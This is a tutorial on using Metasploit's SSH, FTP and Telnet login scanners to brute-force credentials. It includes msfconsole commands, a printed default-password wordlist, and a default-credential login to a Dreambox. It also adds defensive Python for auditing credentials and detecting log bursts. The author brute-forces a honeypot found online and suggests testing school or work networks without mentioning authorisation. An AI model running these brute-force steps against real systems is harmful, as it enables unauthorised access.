Metasploit has been a great help to penetration testers, students, infosec enthusiasts, exploit developers and many others.
Aside from client-side exploits, Metasploit can also be used as a login scanner and a brute-force tool; password guessing is one of the most common attacks and a simple way to check for weak credentials. Take note of this article because it will be useful in the CPLT – Level 1 Course under Class 8: Password Attacks, if you are currently enrolled in that course =).
Now to fire up metasploit, we need to grab the terminal and type:
msfconsole
Alright, because Metasploit has a lot of modules and ships with many exploits and payloads, memorizing all of them is hard. That is why we use the command ‘search <string>’ to find a module that matches a string. You can also use ‘show exploits’ and ‘show payloads’ to list all the exploits and all the payloads respectively. Since our goal in this article is to use Metasploit as a scanner, we filter the search to scanner modules only by typing in the console:
search scanner
Sample Modules of Login Scanners:
SMB Login Checker = auxiliary/scanner/smb/smb_login
VNC Authentication None Scanner = auxiliary/scanner/vnc/vnc_none_auth
Open X11 scanner = auxiliary/scanner/x11/open_x11
SSH Login Scanner = auxiliary/scanner/ssh/ssh_login
Telnet Login Check Scanner = auxiliary/scanner/telnet/telnet_login
TFTP Brute Forcer = auxiliary/scanner/tftp/tftpbrute
FTP Login Check Scanner = auxiliary/scanner/ftp/ftp_login
SAP Management Console Brute Force = auxiliary/scanner/sap/sap_mgmt_con_brute_login
So, for example, if I want to use Metasploit as an SSH login scanner, I can just type:
use auxiliary/scanner/ssh/ssh_login
To know about this module and read its description, we enter the command:
info auxiliary/scanner/ssh/ssh_login
Module Description: “This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.”
Thus, this auxiliary module can be used as a brute-force tool too.
To see what needs to be set for the module (options for the target, the dictionary/wordlist, limits, etc.), you just need to type:
show options
Now let’s setup the IP of the target:
set RHOSTS 144.xxx.x.x
To set your dictionary to be used for scanning, type: set USERPASS_FILE /path
Metasploit ships with a number of wordlists too. One of them is a file named root_userpass.txt; to locate it, we can just type:
find / -name root_userpass.txt
In my case, the path of the wordlist is /opt/framework/msf3/data/wordlists/root_userpass.txt. So to use it as the USERPASS_FILE option, we issue the command:
set USERPASS_FILE /opt/framework/msf3/data/wordlists/root_userpass.txt
Here’s what’s inside ‘root_userpass.txt’:
root
root !root
root Cisco
root NeXT
root QNX
root admin
root attack
root ax400
root bagabu
root blablabla
root blender
root brightmail
root calvin
root changeme
root changethis
root default
root fibranne
root honey
root jstwo
root kn1TG7psLu
root letacla
root mpegvideo
root nsi
root par0t
root pass
root password
root pixmet2003
root resumix
root root
root rootme
root rootpass
root t00lk1t
root tini
root toor
root trendimsa1.0
root tslinux
root uClinux
root vertex25
root owaspbwa
root permit
root ascend
root ROOT500
root cms500
root fivranne
root davox
root letmein
root powerapp
root dbps
root ibm
root monitor
It contains users and passwords separated by a space, one pair per line; a line with only a username means an empty password is tried.
You can edit the wordlist and add other common username/password pairs on new lines.
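Because the USERPASS_FILE format is so simple, it is worth having a small parser for it on the defensive side as well: the same lists an attacker feeds to ssh_login or ftp_login are public, so you can check whether any credential in your own device inventory would be found by such a scan. The following is an added example and not code from the article or from Metasploit; the wordlist excerpt and the inventory are constructed, and the comment/blank-line handling is an assumption for the example (the stock root_userpass.txt has neither).

```python
"""Parse a Metasploit-style USERPASS_FILE and audit credentials against it.

Added example, not code from the original article or from Metasploit.
SAMPLE_USERPASS is a constructed excerpt in the same format as
root_userpass.txt: user and password separated by a space, one pair per
line; a line with only a user means an empty password.
"""
from typing import Dict, List, Set, Tuple

Pair = Tuple[str, str]

# Constructed sample. Assumption for this example: lines starting with '#'
# are comments and blank lines are ignored (the stock file has neither).
SAMPLE_USERPASS = """\
# constructed excerpt in Metasploit USERPASS_FILE format
root
root toor
root changeme
root  password
admin admin

root toor
"""

# Constructed inventory of your own devices: host -> (user, password).
SAMPLE_INVENTORY: Dict[str, Pair] = {
    "router-lab": ("root", "toor"),
    "build-box": ("admin", "Correct-Horse-Battery"),
    "old-switch": ("root", ""),
    "nas": ("backup", "toor"),
}


def parse_userpass(text: str) -> List[Pair]:
    """Return (user, password) pairs in file order, dropping exact duplicates.

    The line is split on the first run of whitespace only, so a password
    that itself contains spaces is kept whole. A line carrying just a user
    yields an empty password (a blank-password probe).
    """
    pairs: List[Pair] = []
    seen: Set[Pair] = set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        pair = (parts[0], parts[1].strip() if len(parts) > 1 else "")
        if pair in seen:
            continue
        seen.add(pair)
        pairs.append(pair)
    return pairs


def audit_inventory(inventory: Dict[str, Pair], wordlist: List[Pair]) -> Dict[str, str]:
    """Return {host: reason} for every host whose credential a scan with
    this wordlist would hit. An empty dict means no host is exposed."""
    listed = set(wordlist)
    listed_passwords = {p for _, p in wordlist if p}
    findings: Dict[str, str] = {}
    for host, (user, password) in inventory.items():
        if (user, password) in listed:
            findings[host] = f"exact pair {user}/{password or '<blank>'} is in the wordlist"
        elif password == "":
            findings[host] = "blank password"
        elif password in listed_passwords:
            findings[host] = f"password {password!r} is in the wordlist under another user"
    return findings


if __name__ == "__main__":
    wordlist = parse_userpass(SAMPLE_USERPASS)
    print(f"{len(wordlist)} unique pairs parsed")
    for host, reason in audit_inventory(SAMPLE_INVENTORY, wordlist).items():
        print(f"{host}: {reason}")
```

The password-only check is deliberately broader than the exact-pair match: a password that sits in a public list is weak regardless of which username it is paired with, so it is reported even when the exact pair is absent.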
I decided to use the wordlist from Piata SSH Scanner (Mass SSH Scanner) that’s why I set it to:
set USERPASS_FILE /root/piata/pass_file
Once all the options are configured, this is how to start the scan. In the screenshot below, I am brute-forcing a known honeypot I found on the web, which is why I censored its IP address.
run
Okay, now let’s try to log in to the host using the credentials the wordlist scan reported…
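From the target’s point of view, a run like the one above leaves a burst of “Failed password” lines in the sshd log, usually followed by an “Accepted password” line from the same address when a wordlist pair works. That pattern is what a defender should alert on. The block below is an added example, not code from the article: it parses constructed auth.log-style lines (hostname, addresses and times are invented), counts failures per source address in a sliding window, and raises a separate alert when a login is accepted right after a run of failures.

```python
"""Flag password-guessing bursts in sshd authentication logs.

Added example, not code from the original article. SAMPLE_AUTH_LOG is
constructed in the syslog format Linux sshd writes to /var/log/auth.log;
the hostname, addresses and times are invented.
"""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple

SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 bastion sshd[2101]: Failed password for root from 198.51.100.23 port 50122 ssh2
Mar  3 10:15:02 bastion sshd[2103]: Failed password for invalid user admin from 198.51.100.23 port 50124 ssh2
Mar  3 10:15:02 bastion sshd[2105]: Failed password for root from 198.51.100.23 port 50126 ssh2
Mar  3 10:15:03 bastion sshd[2107]: Failed password for root from 198.51.100.23 port 50128 ssh2
Mar  3 10:15:04 bastion sshd[2109]: Failed password for root from 198.51.100.23 port 50130 ssh2
Mar  3 10:15:05 bastion sshd[2111]: Accepted password for root from 198.51.100.23 port 50132 ssh2
Mar  3 10:20:40 bastion sshd[2200]: Failed password for alice from 203.0.113.9 port 41000 ssh2
Mar  3 10:20:55 bastion sshd[2202]: Accepted publickey for alice from 203.0.113.9 port 41002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<source>\S+) port \d+"
)
ASSUMED_YEAR = 2024       # syslog lines carry no year; fixed here for the example
FAILURE_THRESHOLD = 5     # failures from one source within WINDOW_SECONDS -> burst
WINDOW_SECONDS = 60
SUCCESS_MIN_FAILURES = 3  # accepted login after this many recent failures -> alert


class Event(NamedTuple):
    when: datetime
    outcome: str   # "Accepted" or "Failed"
    method: str    # "password", "publickey", ...
    user: str
    source: str


def parse_auth_log(text: str) -> List[Event]:
    """Parse sshd Accepted/Failed lines; lines of any other shape are skipped."""
    events: List[Event] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=ASSUMED_YEAR)
        events.append(Event(when, m["outcome"], m["method"], m["user"], m["source"]))
    return events


def detect_bursts(events: List[Event], threshold: int = FAILURE_THRESHOLD,
                  window: int = WINDOW_SECONDS,
                  success_min: int = SUCCESS_MIN_FAILURES) -> List[Dict[str, object]]:
    """Sliding-window count of failures per source address.

    Emits one 'guessing-burst' alert per source when failures inside the
    window reach the threshold, and a 'success-after-failures' alert when a
    login is accepted while at least success_min failures are still in the
    window (the signature of a wordlist run that found a working pair).
    """
    by_source: Dict[str, List[Event]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.when):
        by_source[ev.source].append(ev)

    alerts: List[Dict[str, object]] = []
    for source, evs in by_source.items():
        recent: List[datetime] = []  # failure timestamps still inside the window
        burst_reported = False
        for ev in evs:
            recent = [t for t in recent if (ev.when - t).total_seconds() <= window]
            if ev.outcome == "Failed":
                recent.append(ev.when)
                if len(recent) >= threshold and not burst_reported:
                    alerts.append({"kind": "guessing-burst", "source": source,
                                   "failures": len(recent), "at": ev.when})
                    burst_reported = True
            elif len(recent) >= success_min:
                alerts.append({"kind": "success-after-failures", "source": source,
                               "user": ev.user, "method": ev.method,
                               "failures": len(recent), "at": ev.when})
    return alerts


if __name__ == "__main__":
    for alert in detect_bursts(parse_auth_log(SAMPLE_AUTH_LOG)):
        print(alert)
```

The single failed attempt by alice followed by a key-based login stays below both thresholds and is not reported, which is the behaviour you want for ordinary typos. The same windowed logic applies to FTP and Telnet daemons with a different line regex; on the mitigation side, rate limiting or lockout after a few failures and disabling password authentication on sshd remove the conditions a wordlist run depends on.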
Finally, another example:
Here’s a situation: You are connected to a network at school, work or at your home and you want to test if they have secure passwords for their logins. We can use nmap to scan ports:
nmap -Pn -A 192.168.10.1/24
Here is a screenshot of a Nmap scan report for the IP Address: 192.168.10.7 which will be our target for this example.
From what we can see in the image above, port 21 is open, which is FTP. Thus, we have a clue that we can use the FTP Login Check Scanner, which is auxiliary/scanner/ftp/ftp_login.
use auxiliary/scanner/ftp/ftp_login
info auxiliary/scanner/ftp/ftp_login
Description: “This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.”
Options:
Setting up the target which is 192.168.10.7:
set RHOSTS 192.168.10.7
This time we will use a different approach: guessing the default credentials. The host is a Dreambox, right? According to the common default-password lists on the Internet, Dreamboxes ship with ‘root’ as the default username and ‘dreambox’ as the password. So we can set our options to:
set USERNAME root
set PASSWORD dreambox
Now fire up the attack:
run
Or, if you want to use your own password list, omit the USERNAME and PASSWORD options and use USERPASS_FILE instead, which takes a file of users and passwords separated by a space, one pair per line:
set USERPASS_FILE /opt/framework/msf3/data/wordlists/root_userpass.txt
In most cases, FTP, SSH and Telnet share the same credentials. The Dreambox’s port 23 is open too, which is Telnet access, so let’s try logging in on port 23 with the same username and password that worked for FTP.
telnet 192.168.10.7
The web interface also prompts for a login; I used the same credentials and this is what I got:
What’s next? Try scanning your own network with some of Metasploit’s login scanners and see whether any of your devices still have default or weak passwords.
References: http://www.offensive-security.com/metasploit-unleashed/